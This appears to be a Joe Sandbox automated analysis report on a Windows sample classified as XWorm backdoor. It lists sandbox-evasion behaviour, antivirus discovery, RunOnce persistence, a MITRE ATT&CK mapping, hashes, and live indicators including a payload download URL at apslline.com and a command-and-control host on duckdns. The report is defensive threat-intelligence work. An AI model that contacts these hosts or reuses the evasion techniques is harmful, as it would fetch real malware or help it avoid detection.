Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\H33UCslPzv.exe	API/Special instruction interceptor: Address: 66EAC97
Source: C:\Users\user\Desktop\H33UCslPzv.exe	API/Special instruction interceptor: Address: 33AAC97

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\H33UCslPzv.exe	RDTSC instruction interceptor: First address: 6691A8F second address: 6691A8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000A9h 0x00000008 cmp edi, 5F7C1BECh 0x0000000e jnl 00007F2380DD9C9Ah 0x00000014 pop edi 0x00000015 test dh, bh 0x00000017 cmp ebx, ecx 0x00000019 jc 00007F2380D7F190h 0x0000001b test bx, dx 0x0000001e inc ebp 0x0000001f inc ebx 0x00000020 test eax, eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\H33UCslPzv.exe	RDTSC instruction interceptor: First address: 3351A8F second address: 3351A8F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000A9h 0x00000008 cmp edi, 5F7C1BECh 0x0000000e jnl 00007F2380CC938Ah 0x00000014 pop edi 0x00000015 test dh, bh 0x00000017 cmp ebx, ecx 0x00000019 jc 00007F2380C6E880h 0x0000001b test bx, dx 0x0000001e inc ebp 0x0000001f inc ebx 0x00000020 test eax, eax 0x00000022 rdtsc

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Memory allocated: D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Memory allocated: 35980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Memory allocated: 37980000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Window / User API: threadDelayed 7687			Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Window / User API: threadDelayed 2078			Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\H33UCslPzv.exe

API coverage: 1.8 %

Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780	Thread sleep time: -30437127721620741s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 2072	Thread sleep count: 7687 > 30	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 2072	Thread sleep count: 2078 > 30	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe TID: 5780	Thread sleep count: 31 > 30	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_004062F0 FindFirstFileA,FindClose,	0_2_004062F0
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_004057B5 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004057B5
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_00402765 FindFirstFileA,	5_2_00402765
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_004062F0 FindFirstFileA,FindClose,	5_2_004062F0
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Code function: 5_2_004057B5 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_004057B5

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: H33UCslPzv.exe, 00000005.00000002.2726386871.00000000055E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\Users\user\Desktop\H33UCslPzv.exe	API call chain: ExitProcess graph end node			graph_0-4200
Source: C:\Users\user\Desktop\H33UCslPzv.exe	API call chain: ExitProcess graph end node			graph_0-4192

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_70021A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_70021A98

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Process created: C:\Users\user\Desktop\H33UCslPzv.exe "C:\Users\user\Desktop\H33UCslPzv.exe"

Jump to behavior

Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0Te
Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359D8000.00000004.00000800.00020000.00000000.sdmp, H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managert-

Source: C:\Users\user\Desktop\H33UCslPzv.exe	Queries volume information: C:\Users\user\Desktop\H33UCslPzv.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\H33UCslPzv.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Code function: 0_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403248

Source: C:\Users\user\Desktop\H33UCslPzv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: H33UCslPzv.exe, 00000005.00000002.2726386871.00000000055E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\H33UCslPzv.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H33UCslPzv.exe PID: 5968, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 00000005.00000002.2750831860.00000000359CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H33UCslPzv.exe PID: 5968, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
H33UCslPzv.exe	50%	ReversingLabs	Win32.Backdoor.Xworm
H33UCslPzv.exe	63%	Virustotal		Browse
H33UCslPzv.exe	100%	Avira	TR/AD.NsisInject.oovyn

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif	100%	Avira	TR/AD.NsisInject.oovyn
C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif	50%	ReversingLabs	Win32.Backdoor.Xworm
C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
apslline.com	103.53.40.62	true	false		unknown
xwor3july.duckdns.org	12.221.146.138	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://apslline.com/LfGiMdRCMSvlQHkIpf170.bin	false		unknown
xwor3july.duckdns.org	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://apslline.com/F/&	H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_Error	H33UCslPzv.exe, Thereagainst198.pif.5.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	H33UCslPzv.exe, Thereagainst198.pif.5.dr	false	URL Reputation: safe	unknown
https://apslline.com/A/9	H33UCslPzv.exe, 00000005.00000002.2726386871.0000000005627000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	H33UCslPzv.exe, 00000005.00000002.2750831860.00000000359B0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.53.40.62	apslline.com	India		394695	PUBLIC-DOMAIN-REGISTRYUS	false
12.221.146.138	xwor3july.duckdns.org	United States		7018	ATT-INTERNET4US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1542720
Start date and time:	2024-10-26 08:42:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	H33UCslPzv.exe renamed because original name is a hash value
Original Sample Name:	462c6c970323f0e94eecb835032d8e993fca9ee0c6f944f656dfebde036479ed.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/28@10/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 65 Number of non-executed functions: 68
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:44:34	API Interceptor	295x Sleep call for process: H33UCslPzv.exe modified
07:44:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Extra10 C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif
07:44:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Extra10 C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
103.53.40.62	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse
	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse
	https://go.skimresources.com/?id=129857X1500501&url=https://www.freelansssssssssssssssscer.com/users/login-quick.php?token=30b3628412ea618dcc3f414b266ae263302b3e1b43e6d2d885225319dabe8e68&url=https://secure.adnxs.com/seg?redir=https://link.sbstck.com/redirect/45834840-3c14-4374-8f51-bbcadebab762?j=eyJ1IjoiNGRnZ2x2In0	Get hash	malicious	HTMLPhisher	Browse
12.221.146.138	LtTo3qijh2.exe	Get hash	malicious	XWorm	Browse
	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse
	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse
	17230659061f7212c82a51474b4881c633df451e130ec6cfbd94355d94352086b239967195549.dat-decoded.exe	Get hash	malicious	PureLog Stealer	Browse
	17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	Paymentxx212093.vbs	Get hash	malicious	PureLog Stealer, XWorm	Browse
	17178602463c6b4cdf436b48ec4c5dbc6aee5ae0da7ee001e248c7e98692d8d99ecd71b334854.dat-decoded.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	Paymentxx212093.vbs	Get hash	malicious	XWorm	Browse
	hvnmaynew.exe	Get hash	malicious	PureLog Stealer	Browse
	hvnmaynew.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xwor3july.duckdns.org	LtTo3qijh2.exe	Get hash	malicious	XWorm	Browse	12.221.146.138
	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse	12.221.146.138
	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse	12.221.146.138
apslline.com	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse	103.53.40.62
apslline.com	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse	103.53.40.62

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATT-INTERNET4US	LtTo3qijh2.exe	Get hash	malicious	XWorm	Browse	12.221.146.138
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	63.201.237.131
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	67.114.221.64
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	172.175.149.47
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	23.121.67.54
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	13.157.246.41
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	99.44.38.75
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	69.230.186.175
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	71.135.132.136
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	172.143.111.207
PUBLIC-DOMAIN-REGISTRYUS	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	199.79.62.19
	https://landsmith.ae/continue.html	Get hash	malicious	HTMLPhisher	Browse	103.53.42.223
	PO# 4507573387.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	PO #89230.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	FZCO - PO#12345.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249
	TT Swift copy1.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	PO-000041522.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	MA2402201136.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Shipment.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.249

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	factura Fvsae2400398241025.pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.53.40.62
	SecuriteInfo.com.Program.Unwanted.5510.8307.25058.exe	Get hash	malicious	Unknown	Browse	103.53.40.62
	BKoQ3DF8eD.exe	Get hash	malicious	Stealc	Browse	103.53.40.62
	Rampage.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	103.53.40.62
	v2hvYA53Ys.exe	Get hash	malicious	Stealc	Browse	103.53.40.62
	Zl5QaBwsTJ.exe	Get hash	malicious	Stealc	Browse	103.53.40.62
	sgM0Akbldk.exe	Get hash	malicious	Stealc	Browse	103.53.40.62
	VAIIBIHmtT.exe	Get hash	malicious	Stealc	Browse	103.53.40.62
	RFQ_24196MR_PDF.vbs	Get hash	malicious	GuLoader	Browse	103.53.40.62
	https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1	Get hash	malicious	Unknown	Browse	103.53.40.62

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsx6761.tmp\System.dll	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse
	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse
	https://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exe	Get hash	malicious	Unknown	Browse
	5006_2.6.2.exe	Get hash	malicious	Unknown	Browse
	ocs-office.exe	Get hash	malicious	Unknown	Browse
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse
	jU0hAXFL0k.exe	Get hash	malicious	GuLoader	Browse
	#U4e5d#U6708#U58f0#U660e_40981677.xls	Get hash	malicious	GuLoader	Browse
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse
	MaMsKRmgXZ.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Konkurrencevilkaar\Thereagainst198.pif

Download File

Process:	C:\Users\user\Desktop\H33UCslPzv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	3212629
Entropy (8bit):	7.954369753521349
Encrypted:	false
SSDEEP:	98304:EH5hTCwpsZGol4OU0HTVHzyCj+7BN72vBqx/Yapu5koUX:A20Rol4Sz1H+7j2JiFpu5kPX
MD5:	9ECAE0D26219DDB2355AD7B597887760
SHA1:	3946B3AD9B7233BDDA8053C2410D796BDC9FA21D
SHA-256:	462C6C970323F0E94EECB835032D8E993FCA9EE0C6F944F656DFEBDE036479ED
SHA-512:	728A4282EED54BEF2B75E61EF26104A81F036D89D474ABF49DB406260178D319480A505B1AAC324CAA92D93D3D2383FF69D064367C1F88BAC16611FD21276BD1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@........./.........r.../..............+......Rich...........PE..L......].................b....9.....H2............@...........................?...........@.................................0........`;.x............................................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...X.9..........z..............@....ndata... ...@:..........................rsrc...x....`;......~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsi68DA.tmp

Download File

Process:	C:\Users\user\Desktop\H33UCslPzv.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.441667212304602
Encrypted:	false
SSDEEP:	3:sEMBQEJkJVEjDF7VJimxQoXUn:GVJimxvUn
MD5:	1DA505643EAC073F4677751E8EB03E73
SHA1:	94A9A883DCE8CE8332369F51DCF316F74D747659
SHA-256:	C7D506524D0BB4E1D083F5556DA506EA08A535906AED5CF1F5DF461104E087CE
SHA-512:	3B5F71E89F9B9EB5FEE66273770EC2D907ECC0FBF912DFA67AFEE88EC9C9804806556A91409337B8B8A00D4B32D6E1A7597979F4C869254387B60713B9BB34E4
Malicious:	false
Reputation:	low
Preview:	kernel32::VirtualAlloc(i 0,i 58839040, i 0x3000, i 0x40)p.r1

C:\Users\user\AppData\Local\Temp\nsj6A14.tmp

Download File

Process:	C:\Users\user\Desktop\H33UCslPzv.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.228669708547486
Encrypted:	false
SSDEEP:	3:sAAEVvjsqb7VJ8VL84n:fLlVJ8P
MD5:	4FA88BBEE4C8AEA1ECA565750B019480
SHA1:	EF36BA5B8BB8C3C8E99D51C74034E28482FF60B8
SHA-256:	247F8AE8C1A5CE9D7D7F80ED5F08D0DD42F0706CF1DBFD9BA2E7F0B4EECC85D0
